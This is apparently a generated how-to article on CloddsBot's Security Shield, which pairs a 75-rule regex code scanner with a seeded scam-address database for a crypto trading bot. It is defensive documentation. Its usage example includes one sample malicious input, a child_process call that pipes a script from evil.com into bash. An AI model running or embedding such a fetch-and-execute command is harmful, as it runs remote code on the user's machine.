# How the CloddsBot Security Shield 75-Rule Code Scanner and Scam-Address Database Work

> Explore the CloddsBot Security Shield's 75-rule code scanner and scam-address database. Detect malicious code and block threats in real-time with this unified security facade.

- Repository: [AL/CloddsBot](https://github.com/alsk1992/CloddsBot)
- Tags: how-to-guide
- Published: 2026-09-14

---

**The CloddsBot Security Shield is a unified façade that employs a 75-rule static analyzer to detect malicious code patterns and maintains an in-memory database of 70+ known scam addresses to block threats in real-time.**

The CloddsBot Security Shield serves as the central defense layer for the trading bot, aggregating multiple protective services behind a single interface defined in [`src/security/shield.ts`](https://github.com/alsk1992/CloddsBot/blob/main/src/security/shield.ts). At its core, the shield integrates a **75-rule code scanner** that performs static analysis on user inputs alongside a **scam-address database** that provides constant-time lookups of malicious blockchain addresses. Together, these components intercept high-risk operations before they can compromise user funds.

## Security Shield Architecture

The Security Shield implements a façade pattern that coordinates five distinct protective modules. According to the CloddsBot source code, the façade defined in [`src/security/shield.ts`](https://github.com/alsk1992/CloddsBot/blob/main/src/security/shield.ts) exposes unified methods that delegate to specialized implementations:

- **[`src/security/code-scanner.ts`](https://github.com/alsk1992/CloddsBot/blob/main/src/security/code-scanner.ts)** – Houses the 75-rule regex engine for static analysis
- **[`src/security/scam-db.ts`](https://github.com/alsk1992/CloddsBot/blob/main/src/security/scam-db.ts)** – Maintains the in-memory `Map` of known malicious addresses
- **[`src/security/address-checker.ts`](https://github.com/alsk1992/CloddsBot/blob/main/src/security/address-checker.ts)** – Wraps database lookups with on-chain heuristics (contract age, transaction volume)
- **[`src/security/tx-validator.ts`](https://github.com/alsk1992/CloddsBot/blob/main/src/security/tx-validator.ts)** – Performs pre-trade validation (price sanity, slippage limits)
- **[`src/security/sanitizer.ts`](https://github.com/alsk1992/CloddsBot/blob/main/src/security/sanitizer.ts)** – Detects zero-width characters, RTL tricks, and homoglyph attacks

Each module operates independently but reports through the central `SecurityShield` class, which tracks metrics like `codeScans` and `threatsBlocked`.

## How the 75-Rule Code Scanner Works

### Rule Categories and Severity Levels

The code scanner ships with **75 regular-expression-based rules** organized into nine security categories including *Shell Injection*, *Remote Code Execution*, *Obfuscation*, and *Scripting attacks*. Each rule maps to a specific severity tier: `low`, `medium`, `high`, or `critical`. When `scanCode(source)` encounters a match, the rule's severity contributes to an aggregate `CodeScanResult.level`.

### Scanning Execution Flow

When the shield's `scanCode` method (lines 55-60 of [`src/security/shield.ts`](https://github.com/alsk1992/CloddsBot/blob/main/src/security/shield.ts)) invokes the scanner, the engine iterates through all 75 regex patterns against the supplied source string. The implementation in [`src/security/code-scanner.ts`](https://github.com/alsk1992/CloddsBot/blob/main/src/security/code-scanner.ts) evaluates each pattern sequentially, collecting matched rule identifiers and descriptions into a result object.

```typescript
// Located in src/security/shield.ts lines 55-60
scanCode(source: string): CodeScanResult {
  const result = scanCode(source); // Delegates to code-scanner.ts
  this.metrics.codeScans++;
  if (['high', 'critical'].includes(result.level)) {
    this.metrics.threatsBlocked++;
  }
  return result;
}

```

The scanner returns a `CodeScanResult` containing the matched rule IDs, a descriptive threat summary, and the final severity level.

### Threat Blocking Logic

The Security Shield treats `high` and `critical` severity results as active threats, incrementing the internal `threatsBlocked` counter when detected. Lower severity levels (`low`/`medium`) are logged for audit purposes but do not trigger automatic blocking, allowing the bot to continue operating while flagging suspicious patterns for review.

## How the Scam-Address Database Works

### In-Memory Storage Structure

The scam-address database is implemented as an ES6 `Map<string, ScamEntry>` where keys are normalized, lower-cased address strings. This structure provides **O(1) constant-time lookup** for any Solana (`base58`) or EVM (`0x…`) address check. The `ScamEntry` interface stores metadata including `chain` type, threat `type` (e.g., *drainer*, *phishing*), and a human-readable `label`.

### Database Seeding Process

At module load time, [`src/security/scam-db.ts`](https://github.com/alsk1992/CloddsBot/blob/main/src/security/scam-db.ts) seeds the Map with 70+ entries sourced from public threat intelligence feeds including Etherscan, Mandiant, Check Point Research, and CertiK. The seeding uses a helper function that populates the database before any lookups occur:

```typescript
// From src/security/scam-db.ts
seed(
  '0x11cce5830e5753b9eec2c08a0be7cc6d3734c1bc',
  'evm',
  'drainer',
  'scam-alert.eth'
);

```

Each `seed()` call inserts a verified malicious address with its classification metadata, ensuring the bot recognizes known threats immediately upon startup without requiring external API calls.

### Address Verification Flow

The façade exposes `isKnownScam(address)` (referenced at lines 21-22 and implemented at lines 88-90 of [`src/security/shield.ts`](https://github.com/alsk1992/CloddsBot/blob/main/src/security/shield.ts)) which normalizes the input and queries the Map. If found, the function returns a `ScamEntry` object containing the threat type and label; otherwise, it returns `null`. This lookup occurs in microseconds due to the in-memory storage.

### Integration with On-Chain Heuristics

While the scam database provides static threat intelligence, the [`address-checker.ts`](https://github.com/alsk1992/CloddsBot/blob/main/address-checker.ts) module enhances this with dynamic analysis. When `SecurityShield.checkAddress()` (lines 62-66) is called, the system combines the database lookup with on-chain heuristics such as contract deployment age and recent transaction volume to generate a comprehensive risk score and flag list (e.g., `['Known scam', 'New contract']`).

## Practical Implementation Example

The following example demonstrates initializing the shield and utilizing both the 75-rule scanner and scam-address database:

```typescript
import { createSecurityShield } from './src/security/shield.js';

// Initialize with RPC endpoints for on-chain validation
const shield = createSecurityShield({
  solanaRpcUrl: 'https://api.mainnet-beta.solana.com',
  evmRpcUrl: 'https://eth-mainnet.g.alchemy.com/v2/your-key',
});

// 1. Scan user-provided code for malicious patterns
const suspiciousCode = `const { exec } = require('child_process');
exec('curl https://evil.com/script | bash');`;
const scanResult = shield.scanCode(suspiciousCode);
console.log('Threat level:', scanResult.level); // → 'high' or 'critical'

// 2. Check destination against the 70+ entry scam database
const targetAddress = '0x11cce5830e5753b9eec2c08a0be7cc6d3734c1bc';
const addressCheck = await shield.checkAddress(targetAddress, 'evm');
if (addressCheck.flags.includes('Known scam')) {
  console.error('Blocked: Known drainer address detected');
}

// 3. Validate transaction parameters before signing
const tx = {
  chain: 'evm',
  to: targetAddress,
  value: 1e18,
  gasPrice: 50_000_000_000,
};
const validation = await shield.validateTx(tx);
if (!validation.allowed) {
  throw new Error(`Transaction blocked: ${validation.reasons.join(', ')}`);
}

```

## Summary

- The **Security Shield** acts as a centralized façade in [`src/security/shield.ts`](https://github.com/alsk1992/CloddsBot/blob/main/src/security/shield.ts), coordinating multiple defense modules through a unified API.
- The **75-rule code scanner** performs regex-based static analysis across nine threat categories, returning severity levels from `low` to `critical` and blocking `high`/`critical` threats immediately.
- The **scam-address database** maintains an in-memory `Map` with 70+ pre-seeded malicious addresses from authoritative sources like Etherscan and Mandiant, enabling constant-time lookups for both Solana and EVM addresses.
- Both systems integrate with complementary validators (transaction sanity checks, on-chain heuristics) to provide defense-in-depth for CloddsBot users.

## Frequently Asked Questions

### What categories do the 75 code scanner rules cover?

The rules span nine security categories including **Shell Injection**, **Remote Code Execution**, **Obfuscation**, **Scripting attacks**, **Serialization exploits**, and **Server-Side Request Forgery (SSRF)**. Each category contains multiple regex patterns targeting specific syntax signatures associated with that threat vector.

### How many malicious addresses are pre-loaded in the scam database?

The database ships with **70+ verified malicious addresses** seeded at runtime from threat intelligence feeds including Etherscan, Mandiant, Check Point Research, and CertiK. The in-memory `Map` structure allows instant lookup without external API latency.

### Does the Security Shield support both Solana and EVM blockchains?

Yes. The scam-address database normalizes and stores both **Solana `base58` addresses** and **EVM `0x` hex addresses** within the same `Map` structure. The `checkAddress` method accepts a chain identifier parameter to apply appropriate validation rules for each ecosystem.

### Where does the 75-rule scanner run in the CloddsBot codebase?

The scanner implementation resides in [`src/security/code-scanner.ts`](https://github.com/alsk1992/CloddsBot/blob/main/src/security/code-scanner.ts) and is invoked through the façade's `scanCode` method (lines 55-60 of [`src/security/shield.ts`](https://github.com/alsk1992/CloddsBot/blob/main/src/security/shield.ts)). This design keeps the regex engine decoupled from the main bot logic while allowing the shield to track security metrics centrally.